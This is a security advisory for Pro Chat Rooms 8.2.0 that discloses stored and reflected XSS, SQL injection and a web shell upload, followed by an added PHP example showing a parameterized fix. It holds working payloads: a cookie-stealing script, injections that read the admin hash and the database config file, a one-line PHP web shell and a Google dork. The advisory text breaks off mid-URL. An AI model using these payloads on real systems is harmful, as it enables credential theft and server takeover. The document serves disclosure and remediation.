Pro Chat Rooms 8.2.0 XSS / Shell Upload / SQL Injection

41   2019-08-05 08:08   nipc
Vulnerability Information
Vulnerability ID: 1285
CVE ID: CVE-2014-5275
Vulnerability Type: -
Source: cxs
Publication Date: 2014-08-08
CVSS
CVSS Score: -
Severity: High
Exploit Scope: -
Attack Complexity: -
Authentication Level: -
Vulnerability Description

WLB-2014080034: http://cxsecurity.com/issue/WLB-2014080034
Bug: Pro Chat Rooms 8.2.0 XSS / Shell Upload / SQL Injection (Ascii Version)
Title: Pro Chat Rooms 8.2.0 XSS / Shell Upload / SQL Injection
Dates: 2014-08-08 / 2014-10-28
Author: Mike Manzotti @ Dionach Ltd
Risk: High
CWE: CWE-89, CWE-79, CWE-264
CVE: CVE-2014-5275, CVE-2014-5276
Local: No
Remote: Yes

POC

# Exploit Title: Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities
# Google Dork: intitle:"Powered by Pro Chat Rooms"
# Date: 5 August 2014
# Exploit Author: Mike Manzotti @ Dionach Ltd
# Vendor Homepage: http://prochatrooms.com
# Software Link: http://prochatrooms.com/software.php
# Version: v8.2.0
# Tested on: Debian (Apache+MySQL)

1) Stored XSS
=============

The Text Chat Room Software of Pro Chat Rooms is vulnerable to Stored XSS. After registering an account, an attacker can upload a profile picture containing JavaScript code as shown below:

POST: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="uploadedfile"; filename="nopic333.jpg"
Content-Type: image/jpeg

<script>alert(document.cookie)</script>

By inspecting the response, the web application returns a 32-digit value in the hidden input "imgID" as shown below:

Response:
<input type="hidden" name="imgID" value="798ae9b06cd900b95ed5a60e02419d4b">

The picture is uploaded under the directory "/profiles/uploads" and is accessible by force browsing to the 32-digit value as shown below:

http://<WEBSITE>/prochatrooms/profiles/uploads/798ae9b06cd900b95ed5a60e02419d4b

[Image]

2) Reflected XSS
================

The Text Chat Room Software of Pro Chat Rooms is vulnerable to Reflected XSS. The parameter "edit" is not encoded:

http://<WEBSITE>/prochatrooms/profiles/index.php?id=1&edit="><script>alert(document.cookie)</script>

3) SQL Injection
================

The Text Chat Room Software of Pro Chat Rooms is vulnerable to SQL injection. Across the whole source code of the web application, parameterized queries are used to query the database. However, a lack of data sanitization of three parameters leaves the web application vulnerable to SQLi.

The vulnerable parameters are located as shown below:

prochatrooms_v8.2.0/includes/functions.php: ~2437
$params = array(
    'password' => md5($password),
    'email' => makeSafe($email),
    'id' => $id
);
$query = "UPDATE prochatrooms_users SET email = '".$email."', password='".md5($password)."' WHERE id = '".$id."' ";

prochatrooms_v8.2.0/includes/functions.php: ~2449
$query = "UPDATE prochatrooms_users SET email = '".$email."' WHERE id = '".$id."' ";

prochatrooms_v8.2.0/includes/functions.php: ~3110
$query = "UPDATE prochatrooms_users SET active = '".$offlineTime."', online = '0' WHERE username = '".makeSafe($toname)."' ";

Note that the "makeSafe" function is defined as shown below and will protect against XSS attacks only:

prochatrooms_v8.2.0/includes/functions.php: ~125
function makeSafe($data) {
    $data = htmlspecialchars($data);
    return $data;
}

After registering an account, an attacker can exploit the SQL injection by editing the email field as shown below, which will retrieve the MD5 hashed password of the administrator:

POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="profileEmail"

mm@1dn.eu', email=(select adminLogin from prochatrooms_config) where id ='1';#

The following SQL injection will retrieve the SQL connection string, which probably contains clear-text database credentials:

POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="profileEmail"

mm@1dn.eu', email=(select load_file('/var/www/prochatrooms/includes/db.php')) where id ='1';#

4) Arbitrary File Upload
========================

It is possible to combine the Stored XSS and SQL injection vulnerabilities to upload a web shell on the server. The following request will upload a PHP web shell and the web application will return a 32-digit value.

POST: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="uploadedfile"; filename="m.jpg"
Content-Type: application/octet-stream

<?php system($_GET[cmd]);?>

Response:
<input type="hidden" name="imgID" value="82d0635538da4eac42da25f8f95f8c45">

Since the uploaded web shell has no extension it will not be executed:

http://<WEBSIT
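As an added example (not code from the advisory or from Pro Chat Rooms), the concatenation defect quoted above from includes/functions.php is placed next to a parameterized rewrite that binds the $params array the original code already builds; makeSafe is reimplemented from the snippet on the page, while the PDO handle, the SQLite stand-in, the function names and the integer type of id are assumptions.

```php
<?php
// Added example, not Pro Chat Rooms code: the concatenation defect the advisory
// quotes from includes/functions.php (~2437) next to a parameterized version that
// binds the $params array the original code already builds. $pdo, the function
// names and the int type of id are assumptions.
declare(strict_types=1);

// Same as the makeSafe() quoted on the page. It HTML-encodes for output only; on
// PHP < 8.1 the default flags do not even touch a single quote, and HTML encoding
// is never an SQL escape anyway.
function makeSafe(string $data): string
{
    return htmlspecialchars($data, ENT_COMPAT | ENT_HTML401);
}

// The defect as quoted: $params is assembled and then ignored, and $email lands
// in the SQL text unescaped. Returns the SQL instead of running it so the
// resulting statement can be inspected.
function buildVulnerableUpdate(string $email, string $password, string $id): string
{
    $params = ['password' => md5($password), 'email' => makeSafe($email), 'id' => $id];
    return "UPDATE prochatrooms_users SET email = '" . $email
        . "', password='" . md5($password) . "' WHERE id = '" . $id . "' ";
}

// Hardened form: the same values go through placeholders, so a quote inside
// $email is data, not syntax. md5() is kept only because that is what the
// product's schema stores; new code should use password_hash().
function updateUserSafe(PDO $pdo, string $email, string $password, int $id): int
{
    $params = ['password' => md5($password), 'email' => $email, 'id' => $id];
    $stmt = $pdo->prepare(
        'UPDATE prochatrooms_users SET email = :email, password = :password WHERE id = :id'
    );
    $stmt->execute($params);
    return $stmt->rowCount();
}

// Constructed input: a legitimate address with an apostrophe is enough to show
// the problem; it closes the string literal in the concatenated version.
$email = "o'connor@example.com";
echo buildVulnerableUpdate($email, 'secret', '1'), PHP_EOL;

// In-memory SQLite stand-in for the MySQL table, so the safe path runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->exec('CREATE TABLE prochatrooms_users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)');
$pdo->exec("INSERT INTO prochatrooms_users VALUES (1, 'old@example.com', '')");
echo updateUserSafe($pdo, $email, 'secret', 1), " row updated", PHP_EOL;
```

The first echo shows the apostrophe breaking out of the email literal, which is the same mechanism the advisory's profileEmail payloads rely on; the prepared statement stores the address unchanged.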